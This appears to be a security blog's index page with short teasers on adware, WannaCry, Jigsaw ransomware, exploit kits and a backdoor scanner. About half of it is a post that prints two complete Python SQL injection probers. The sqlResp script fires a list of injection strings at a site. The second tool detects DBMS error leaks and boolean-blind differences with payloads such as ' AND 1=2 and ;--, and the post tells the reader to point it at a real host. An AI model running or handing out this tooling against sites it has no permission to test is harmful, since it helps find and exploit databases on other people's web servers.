Analysis OSSProxy MarketScore OpinionSpy Adware/PUP/Trojan/Malware comScore vs Nielsen

A few days back one of our virus/malware file submission sites received close to a hundred executables from two IP addresses within a one-hour period, all comScore, Inc.-related samples being run through AV detection scans one file at a time. The activity raised some interest at first because the binaries were built for several operating systems, such as Linux … Read more

What is the Difference between Adware and Malware FIREBALL / Elex – WHAT YOU NEED TO KNOW!

A question I am frequently asked is what the difference is between adware (legal software that nonetheless floods you with ads to make money) and malware (crimeware, to be specific). There is typically a fine line between the two. A good example of a successful adware company is OpinionSpy/Marketscore, which bundles … Read more

Python Script to scan for vulnerable servers allowing SQL Injection

The script as posted (garbled quotes and lost backslashes repaired, and ported from the Python 2 httplib module to Python 3 http.client; the loop at the end is the minimal completion needed to make the fragment run, since the rest of the post is behind the Read more link):

```python
#!/usr/bin/env python3
# sqlResp v1.0 - d3hydr8[at]gmail[dot]com
# Sends each injection string from a file as a GET path and prints the HTTP
# status; an unexpected 500 on an injected path is the signal it looks for.
import sys
import http.client


def main(host, path):
    try:
        conn = http.client.HTTPConnection(host, timeout=10)
        conn.request("GET", path)
        r1 = conn.getresponse()
        print("[+]", host + path, ":", r1.status, r1.reason)
    except Exception as err:
        print("[-] Error Occurred:", err)


if len(sys.argv) != 3:
    print("\nUsage: %s <site> <list of injections>" % sys.argv[0])
    print("Example: %s example.com injections.txt\n" % sys.argv[0])
    sys.exit(1)

print("\n d3hydr8[at]gmail[dot]com sqlResp v1.0")
print("-" * 46)

try:
    injects = open(sys.argv[2], "r").readlines()
except IOError:
    # assumed completion: the posted fragment ends here
    print("[-] Could not open", sys.argv[2])
    sys.exit(1)

for inject in injects:
    main(sys.argv[1], inject.strip())
```

Note that the status code is a weak oracle: a 500 only appears when the application lets the database error bubble up, and 200 with an empty or error page is missed entirely. … Read more
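A sturdier way to read the responses, added here as an example and not part of the original sqlResp script: request the unmodified page once as a baseline, then compare each injected request against it, checking the body for DBMS error strings and for a large change in content length rather than trusting the status code alone. The error signatures, the SAMPLE_RESPONSES dictionary and the fake_fetch transport are constructed for the example; http_fetch is the real transport for a host you are authorised to test.

```python
import re
import http.client
from urllib.parse import quote

# Illustrative, non-exhaustive DBMS error signatures (assumption, not from the page).
SQL_ERROR_PATTERNS = [
    re.compile(p, re.IGNORECASE) for p in (
        r"You have an error in your SQL syntax",               # MySQL
        r"Warning: mysql_",                                     # PHP mysql_* warnings
        r"Unclosed quotation mark after the character string",  # MSSQL
        r"ORA-\d{5}",                                           # Oracle
        r"ERROR:\s+syntax error at or near",                    # PostgreSQL
        r"SQLite3?::|SQLITE_ERROR",                             # SQLite
    )
]


def classify(status, body, baseline_status=200, baseline_len=None):
    """Rank the evidence that an injected request reached a SQL backend.
    Returns 'sql-error', 'server-error', 'changed' or 'quiet'."""
    if any(p.search(body) for p in SQL_ERROR_PATTERNS):
        return "sql-error"          # error text leaked into the page
    if status >= 500:
        return "server-error"       # what the status-only script keys on
    if status != baseline_status:
        return "changed"
    if baseline_len is not None:
        # treat a >10% (and >20 byte) length swing as a behavioural change
        if abs(len(body) - baseline_len) > max(20, baseline_len // 10):
            return "changed"
    return "quiet"


def run_probes(host, base_path, injections, fetch):
    """fetch(host, path) -> (status, body). Fetches base_path once as the
    baseline, then base_path + injection for each payload; returns a list of
    (path, status, verdict) tuples."""
    b_status, b_body = fetch(host, base_path)
    results = []
    for inj in injections:
        path = base_path + inj
        status, body = fetch(host, path)
        results.append((path, status, classify(status, body, b_status, len(b_body))))
    return results


def http_fetch(host, path, timeout=10):
    """Real transport: percent-encodes the path so quotes and spaces in the
    payload are legal on the wire (http.client rejects raw spaces)."""
    conn = http.client.HTTPConnection(host, timeout=timeout)
    conn.request("GET", quote(path, safe="/?=&;'%"))
    r = conn.getresponse()
    return r.status, r.read().decode("utf-8", "replace")


# Constructed sample responses standing in for a target (example data only).
SAMPLE_RESPONSES = {
    "/item.php?id=1":         (200, "<html><body>Widget: blue widget, $4.99</body></html>"),
    "/item.php?id=1'":        (200, "<html><body>You have an error in your SQL syntax; check the manual</body></html>"),
    "/item.php?id=1 AND 1=2": (200, "<html><body></body></html>"),
    "/item.php?id=1;--":      (500, "<html><body>Internal Server Error</body></html>"),
    "/item.php?id=1 AND 1=1": (200, "<html><body>Widget: blue widget, $4.99</body></html>"),
}


def fake_fetch(host, path):
    """Offline transport that answers from SAMPLE_RESPONSES."""
    return SAMPLE_RESPONSES.get(path, (404, "Not Found"))


INJECTIONS = ["'", " AND 1=2", ";--", " AND 1=1"]

if __name__ == "__main__":
    for path, status, verdict in run_probes("example.com", "/item.php?id=1", INJECTIONS, fake_fetch):
        print("[%-12s] %3d %s" % (verdict, status, path))
```

The 'changed' verdict on the AND 1=2 payload against a 'quiet' AND 1=1 is the boolean-blind signal the status-only script cannot see; swap fake_fetch for http_fetch to run it against a real host.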

Syhunt Web Backdoor Scanner .LUA or .EXE – Easy Customization and Configuration

So I found this neat little script lying around; it makes looking for backdoors and webshells on web servers a cakewalk. Backdoors are always changing and different hacker groups rename common backdoors, so you can update this script with new intel in a few seconds. To add a new filename to search for, simply add /newfilename in … Read more

SonicWALL TZ 190 01-SSC-6851 Wireless Security Appliance Firewall

The Dell SonicWALL TZ 190 Series is a high-performance, multi-layered network security platform that integrates Type II PC Card-based 3G wireless broadband support, automated failover/failback, a deep packet inspection firewall and optional 802.11b/g wireless LAN access. The TZ 190 Series enables organizations to establish secure 3G wireless broadband network access instantly without … Read more

Wcry WannaCry WCry Ransomware Malware ETERNALBLUE/MS17-010 Worm is dead or is it? – active new IOCs Domain Names/IPs

Ransomware is nothing new; it has been wreaking havoc on the world since at least 2012. The TTPs for delivering it and infecting victims have changed over the years, but the end goal remains the same: give me your money or you will never see your files again. Some of the first ransomware campaigns used mechanisms such as exploit … Read more

JIGSAW Ransomware does not use C2 infrastructure and is proving to be a lot harder to shut down than researchers originally thought

A new sample was released today courtesy of  which can be located at the reference linked at the bottom. The ransomware is currently being distributed mostly via malspam campaigns, but was also observed being served up by the Lord exploit kit, and links were found posted on hacked WordPress sites and forums for drive-by-download … Read more

Active Exploit Kits and their Evolution From Blackhole to Fallout, Spelevo, Purple Fox and Lord

In 2010 the crimeware scene became more profitable than ever, and the main malware being used to generate revenue was FakeAV and scareware. Infecting a host was not easy until Paunch hit the scene and developed a way to use publicly available exploits, as well as buying 0day exploits on the … Read more